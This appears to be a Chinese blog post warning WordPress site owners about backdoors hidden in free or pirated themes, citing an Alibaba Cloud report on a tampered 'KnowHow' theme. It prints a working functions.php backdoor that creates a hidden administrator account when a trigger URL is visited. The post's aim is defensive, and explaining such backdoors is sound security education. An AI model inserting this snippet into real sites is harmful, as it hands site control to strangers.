2014-11-24 10:06:45

小心免费主题!那些WordPress主题后门,一招拥有管理员权限


小心免费主题!那些WordPress主题后门,一招拥有管理员权限
WordPress是国内站长非常喜欢采用的一款建站应用软件,由于其具有非常丰富的模版和插件,具有良好的可扩展性。特别对于博客类网站,WordPress几乎成为建站首选。 但是根据阿里云的安全报告,WordPress一直是黑客攻击的主要目标,今天我们就说说WordPress主题后门,免费主题,免费的往往是最贵的,目前我站使用的主题是我自己制作的,请大家放心访问。 [caption id="" align="aligncenter" width="1000"]小心免费主题!那些WordPress主题后门,一招拥有管理员权限 小心免费主题!那些WordPress主题后门,一招拥有管理员权限[/caption] 下图是阿里云云盾安全运营团队对第三方应用遭受攻击的统计(Source:第27期阿里云云盾安全运营报告,http://security.aliyun.com/doc/view/13762631.html): [caption id="" align="aligncenter" width="406"]WordPress是攻击者最主要的攻击目标之一 WordPress是攻击者最主要的攻击目标之一[/caption] WordPress存在安全隐患的原因主要在于两个方面:一方面由于应用功能的丰富,程序越来越复杂,WordPress屡暴漏洞在所难免;另一方面提供WordPress主题和插件下载的网站五花八门、鱼龙混杂。很多黑客恰恰利用了这个现状,通过各种提供WordPress建站资源下载的网站散布带有恶意脚本的插件。事实上,上述两方面原因中后者的安全隐患更大。对于一个渴望找到建站资源的网站站长,在下载插件程序时,往往疏于防护,对提供下载资源的来源网站不加选择。 网上很多好的免费主题,破解主题,下载虽然也可以正常使用,但是在你以为正常的时候,很可能就有不正常的事情发生了…… 这次举例的是一段很简单的代码,只需几行代码就可以为主题留下后门,不懂代码的小白就要注意了…… [php] add_action( "wp_head", "my_backdoor" ); function my_backdoor() { if ( md5( $_GET["backdoor"] ) == "34d1f91fb2e514b8576fab1a75a89a6b" ) { require( "wp-includes/registration.php" ); if ( !username_exists( "backdoor" ) ) { $user_id = wp_create_user( "backdoor", "pa55w0rd!" ); $user = new WP_User( $user_id ); $user->set_role( "administrator" ); } } } [/php] 从上面代码,大概简单说明下,代码主要放于functions.php文件里面,不会影响任何功能使用,如果存在此代码,任何人只要运行http://www.你的域名.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。 同样具备管理员的权限,很编辑主题代码文件,相信此时你一定感觉到很危险了吧,赶紧检查检查自己的主题代码吧…… 云盾安全技术团队还在不久前截获了一个带有后门的WordPress程序。这个后门程序存在于WordPress一个叫做“KnowHow”的主题插件中。在这个插件里,发现如下代码: [caption id="" align="aligncenter" width="423"]WordPress主题程序中的后门 WordPress主题程序中的后门[/caption] 红圈内的代码,很显然,就是后门。攻击者利用这个后门可以进一步获得网站的控制权。 经过云盾安全技术人员进一步调查,KnowHow是一款非常流行的WordPress主题。KowHow主题是收费的,价格为48美金。为了明确问题的根源,技术人员决定从确定被植入后门的程序来源入手。 和用户沟通后证实,该用户并非购买的正版主题,而是从国内某偏僻站点下载。与此同时,从官方渠道下载了一份同版本的主题程序,两者进行了比较。结果证实官方版本中并没有相对应的后门代码。因此,用户下载的程序显然是被人恶意修改后发布的版本。 云盾安全技术人员接下来经过搜索和对比, 发现大量国内此主题的下载文件中被人嵌入了类似的后门。 在明确了后门问题的原因后,云盾安全运营团队立刻对阿里云全网用户进行了扫描,并在第一时间通知了存在类似安全隐患的阿里云用户。 最后,对于WordPress KnowHow主题后门,阿里云云盾安全运营团队提出如下建议: 第一,请已下载并安装Knowhow主题的站长尽快检查自己的网站服务器,找到 /wp-content/themes/knowhow/functions.php文件,对比上文检查是否存在恶意代码。后门特征一般含有eval字符; 第二,从官方或具有良好信誉的网站下载插件,不要随意下载/添加不明站点的代码; 第三,请购买正版软件。

商业用途请联系作者获得授权。
版权声明:本文为博主「任霏」原创文章,遵循 CC BY-NC-SA 4.0 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://www.renfei.net/posts/1000194
评论与留言
以下内容均由网友提交发布,版权与真实性无法查证,请自行辨别。

本站有缓存策略,时间约2小时后能看到您的评论。本站使用自动审核机制,如果您的内容包含广告/谩骂/恐怖/暴力/涉政等不和谐内容将无法展示!


本站有缓存策略,时间约2小时后能看到您的评论。本站使用自动审核机制,如果您的内容包含广告/谩骂/恐怖/暴力/涉政等不和谐内容将无法展示!

关注任霏博客
扫码关注「任霏博客」微信订阅号
微博:任霏博客网
Twitter:@renfeii
Facebook:任霏
最新留言 这个恶意攻击是只有服务器安装有Redis 才会遭受攻击吗 我用电脑和手机分别访问了45,133,203,192 这个ip地址,这个ip地址对应的服务器是不是只托管了脚本,提供木马自动去下载,并没有任何攻击性的东西,是这样的吗? 你好,我这边想问下,镜像服务启动了,该连接哪个数据库呢? 不更新? 优先级低的并不代表一定要等到优先级高的运行完才能运行,只是cpu分配的资源少了而已。 /lib64/ld-linux-x86-64.so.2: No such file or directory 报了这个错误,怎么解决呢 对于一个布道 DevOps 多年的选手来讲,看到这个报告,还是想继续布道布道。虽然是各种对比哈,但是我感觉与 DevOps 太像了(可能是职业病犯了哈)。首先声明本人不是GitLab 用户(因为不免费,没法薅羊毛啊),本人是 GitHub 忠实用户。 首先,你这是田忌赛马的对比,中文对比一事,着实有点可笑 1 土生土长和外来户能立马拉到同一个起跑线上吗? 2 一个真正的开发者应该去提升自己的英语能力,而不是拿全部是中文文档说事。大家都知道现在开源非常热,开发者是开源的主力军,如果要贡献优秀的开源项目(诸如Linux 内核,Kubernetes),英语就是个硬门槛。如果我是你,我倒希望公司内部的系统是英文的,最起码能让我锻炼英语,在看开源项目文档的时候不至于看不懂,提 PR 的时候不至于提交代码的内容描述不清楚而没法被 Merge。 其次,阿里云效、Coding 大家都知道背后站的是谁,很容易造成厂商绑定,现在很多企业都希望不要被厂商绑定。 再者,有一个点需要明白,GitLab 是一个 DevOps 平台,什么叫做 DevOps 平台(DevOps 走到现在,确切的说应该叫做 DevSecOps)?就是覆盖了软件开发生命周期全阶段的,从项目管理到代码托管到安全再到日志监控、甚至包含现在的云原生能力。不仅仅是说一个 CI/CD 就能概括的了的。这一点是 DevOps 布道的真正误区,我见过太多了,我在这儿再布道一哈,CI/CD 不等于 DevOps,他只是 DevOps 落地实践的核心能力。仅凭借一个 CI/CD 能有现成模版就判断出哪个好坏,过于牵强了吧。相信大家真正到项目用的时候,模版是满足不了要求的吧,毕竟大家都很特性化。 最后,还是一个很热的话题,开源,open source。GitLab 是开源的,Coding 和 云效这方面我没看到相关的开源内容(可能是我孤陋寡闻)。大家可以看看国内有多少用 GitLb 的,GitLab 的 CE 版,然后私有化部署,就是很多公司的代码托管 + DevOps 解决方案。 个人愚见,做一些对比报告的时候,还是先需要明白这个产品的定位,去深入挖掘一些真正有意义的对比,这样的对比报告才能有意义。作为一个常年写博客、文章的人来说。你写的每个字、每篇文章,你要想到你的思想会影响到别人。有可能因为你的片面之词,让别人错失一些学习的好机会。 docker run 那一长串后,出来一个字符串,然后去 docker containers 下面看 显示 exited(1);logs 下就一行错误 initdb failed 感谢🙏,第一个问题是空格的问题应该,我逐字敲完后可以构建了.第二个问题是我docker环境的问题,docker更新为最新版后需要重置配置文件.现已经正常使用,再次感谢您的分享和您的细心解答,期待下次相遇😄 还有一个问题可以请教下吗?就是我在容器里建文件夹没有权限,su root后密码不知道是多少,sudo mkdir xxx 提示我,没有sudo命令,请问有好的解决方法吗?谢谢解答 -v 后面可以指定文件吗 我的也是报错,还有。我执行了这个:@localhost kingbase-es-v8-r3-docker % docker run -d --name kingbase -p 54321:54321 -e SYSTEM_PWD=SYSTEM -v /opt/kingbase/data:/opt/kingbase/data -v /opt/kingbase:/opt/kingbase/Server/bin kingbase:v8r3 docker: 'run -d --name kingbase -p 54321:54321 -e SYSTEM_PWD=SYSTEM -v /opt/kingbase/data:/opt/kingbase/data -v /opt/kingbase:/opt/kingbase/Server/bin kingbase:v8r3' is not a docker command. See 'docker --help' 麻烦帮忙看下,是不是我写的命令有问题,还是版本问题,谢谢啦